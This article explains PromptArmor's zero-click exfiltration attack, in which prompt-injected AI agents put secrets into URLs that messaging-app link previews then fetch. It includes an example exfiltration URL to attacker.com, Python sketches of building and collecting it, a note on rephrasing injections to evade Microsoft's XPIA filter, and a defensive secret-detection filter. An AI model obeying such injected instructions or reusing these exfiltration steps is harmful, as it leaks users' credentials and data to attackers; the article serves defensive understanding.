AI agents leak secrets through messaging app link previews
PromptArmor demonstrated that AI agents in messaging platforms can exfiltrate sensitive data without any user interaction. Malicious prompts trick AI agents into generating URLs with embedded secrets (API keys, credentials), and the messaging platform's automatic link preview feature fetches these URLs, completing the exfiltration before the user even sees the message. Microsoft Teams with Copilot Studio was the most affected, with Discord, Slack, Telegram, and Snapchat also vulnerable.
The Feature That Became a Channel
Link previews are one of those convenience features that nobody thinks about. When you paste a URL into a messaging app, the app automatically fetches the page and displays a preview - a title, a description, maybe a thumbnail image. It happens instantly, before anyone clicks the link, because the whole point is to give recipients context about what they'd be clicking on.
AI security firm PromptArmor discovered that this unremarkable piece of messaging infrastructure can be weaponized when combined with AI agents. The attack is elegant in its simplicity: trick an AI agent into generating a URL that contains sensitive data as part of the URL itself (such as API keys, credentials, or confidential text embedded in query parameters), and let the messaging platform's link preview feature do the rest. When the platform fetches the URL to generate the preview, it sends a request to the attacker's server - complete with whatever secrets are encoded in the URL. No click required. No user interaction of any kind.
How the Attack Works
The attack chain has three steps, none of which require the victim to do anything suspicious.
First, a malicious prompt is delivered to an AI agent. This could arrive through any channel the agent monitors - a message in a chat, an email, a document it processes. The prompt instructs the agent to gather specific sensitive information from its environment (API keys, credentials, internal data) and construct a URL containing that information as parameters.
Second, the AI agent follows the instructions. It retrieves the requested data and generates a message containing a URL - something like https://attacker.com/collect?data=[stolen_credentials]. The agent outputs this as part of its response, which appears in the messaging platform.
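The agent's side of this step amounts to nothing more than URL encoding. A minimal sketch of what the instructed agent effectively produces (the `attacker.com` domain and the `data` parameter follow the example above; the key is a placeholder, not a real credential):

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Placeholder standing in for whatever the agent was tricked into retrieving.
stolen = "sk-live-EXAMPLE-NOT-A-REAL-KEY"

# The exfiltration URL: the secret rides along as an ordinary query parameter.
exfil_url = "https://attacker.com/collect?" + urlencode({"data": stolen})

# Recovering the secret from the server's request log is a one-liner.
recovered = parse_qs(urlparse(exfil_url).query)["data"][0]
```

Nothing in the URL is obfuscated or exotic; to the messaging platform it is indistinguishable from any other link the agent might share.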
Third, the messaging platform's link preview feature kicks in automatically. Before the user even reads the message, the platform's servers (or the user's client) fetch the URL to generate a preview. That fetch request hits the attacker's server, which logs the URL parameters - and with them, whatever secrets the AI agent embedded.
The entire chain completes without the user clicking anything, approving anything, or even reading the message. It's a zero-click exfiltration channel that exploits the AI agent's access to data and the messaging platform's eagerness to be helpful.
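The attacker's side of the chain is equally trivial. The sketch below simulates it end to end, with a local loopback server standing in for the attacker's endpoint and a plain GET standing in for the platform's preview fetcher (both are simplifying assumptions; real preview engines also parse the response for title and image metadata, but the secret has already leaked by then):

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from urllib.request import urlopen

captured = []  # what the "attacker" ends up with

class CollectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log whatever the preview fetcher put in the query string.
        captured.append(parse_qs(urlparse(self.path).query))
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        pass  # silence default request logging

# Loopback server standing in for the attacker-controlled host.
server = HTTPServer(("127.0.0.1", 0), CollectHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
port = server.server_address[1]

# Stand-in for the platform's link preview fetcher: it simply GETs the URL,
# with no user involved.
urlopen(f"http://127.0.0.1:{port}/collect?data=leaked-secret")
server.shutdown()

print(captured)  # [{'data': ['leaked-secret']}]
```

The "victim" in this simulation never runs any code at all; the fetch that delivers the secret is issued by infrastructure acting on the victim's behalf.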
The Affected Platforms
PromptArmor tested the technique across multiple messaging platforms and found widespread vulnerability. Microsoft Teams with Copilot Studio was the most severely affected, which makes sense given that Copilot Studio agents often have access to corporate data through Microsoft 365 integration. The potential exfiltration surface for a Teams-based attack includes intellectual property files, business contracts, legal documents, internal communications, and financial data.
Discord, Slack, Telegram, and Snapchat were also vulnerable to varying degrees. OpenClaw was specifically called out as vulnerable when using default configurations in Telegram, though PromptArmor noted that this could be mitigated by changing a setting in OpenClaw's configuration file.
PromptArmor published a website where users can test their own AI agents integrated into messaging apps to see whether they trigger insecure link previews. The tool is designed to help organizations audit their exposure without needing to execute the attack for real.
The Microsoft Copilot Angle
The Microsoft Teams vulnerability was particularly significant because Copilot is deeply integrated into Microsoft 365. A related attack demonstrated by researchers showed that a seemingly innocuous email sent to a target could contain a hidden prompt instructing Copilot to exfiltrate sensitive corporate data to an attacker-controlled server.
The researchers noted that the prompt needs to be phrased conversationally - like speaking to a human - to bypass Microsoft's cross-prompt injection attack (XPIA) defenses. This is a recurring theme in AI security: the defenses are designed to catch obviously malicious instructions, but they can be circumvented by rephrasing the same instructions in natural language that the AI interprets identically but the defense filters don't flag.
Microsoft addressed the specific vulnerability after responsible disclosure. But the underlying architectural issue - that AI agents with data access can be instructed to embed secrets in URLs, and that messaging platforms will automatically fetch those URLs - persists across the ecosystem.
Two Features, One Vulnerability
The vulnerability exists at the intersection of two independently useful features, neither of which is dangerous on its own.
AI agents with data access are useful because the whole point of an AI assistant is to retrieve and synthesize information. An AI agent that can't access files, emails, or credentials wouldn't be very helpful.
Link previews are useful because they give messaging participants context about shared URLs without requiring them to click potentially unsafe links. The irony is that link previews were partly conceived as a safety feature - they let you see what's behind a URL before you commit to visiting it.
The problem is that nobody designed these features to work together safely. The AI agent doesn't know (or care) that its output will be processed by a link preview engine. The link preview engine doesn't know (or care) that the URL it's fetching was generated by an AI agent that was tricked into encoding secrets in it. Each component works as designed. The vulnerability is emergent - it exists only in the composition of the two features, in the gap between what each component assumes about the other.
The Broader Pattern
This is another entry in the growing catalogue of attacks that exploit the trust boundaries between AI agents and the platforms they operate within. The AI agent trusts its input (even when that input is a malicious prompt). The messaging platform trusts the AI agent's output (automatically fetching any URL it generates). The attacker doesn't need to compromise either system - they just need to send a message that the AI agent will process as an instruction.
For organizations deploying AI agents in messaging platforms, the immediate defensive question is whether to disable link previews for AI-generated messages, restrict what data AI agents can access, or implement output filtering that detects and blocks URLs containing sensitive material. None of these options are simple, and each involves tradeoffs between security and the convenience that drove the adoption of AI agents in the first place.
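As a sketch of the output-filtering option, a hypothetical filter could scan agent messages for URLs whose query-string values match credential-like patterns before the message is ever posted (and before any preview fetch can fire). The function name and patterns below are illustrative assumptions, not a production ruleset; a real filter would need far broader coverage and would still miss secrets the attacker encodes creatively:

```python
import re
from urllib.parse import urlparse, parse_qs

# Illustrative credential-shaped patterns; real deployments would use a
# maintained secret-detection ruleset, not this short list.
SECRET_PATTERNS = [
    re.compile(r"^sk-[A-Za-z0-9-]{16,}$"),   # OpenAI-style API key
    re.compile(r"^AKIA[0-9A-Z]{16}$"),       # AWS access key ID
    re.compile(r"^[A-Za-z0-9+/=]{40,}$"),    # long opaque token
]
URL_RE = re.compile(r"https?://\S+")

def message_is_safe(text: str) -> bool:
    """Return False if any URL in the text carries a secret-looking value."""
    for url in URL_RE.findall(text):
        for values in parse_qs(urlparse(url).query).values():
            for value in values:
                if any(p.match(value) for p in SECRET_PATTERNS):
                    return False
    return True

print(message_is_safe("See https://example.com/docs?page=2"))               # True
print(message_is_safe("https://attacker.com/c?data=AKIAABCDEFGHIJKLMNOP"))  # False
```

Even this crude check highlights the tradeoff: it must run on every agent message, it will produce false positives on legitimate long tokens, and it is a blocklist racing against an adaptive attacker.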
PromptArmor's research makes the tradeoff concrete: the feature that shows you what's behind a link before you click it can now also show the attacker what's in your inbox before you know they're looking.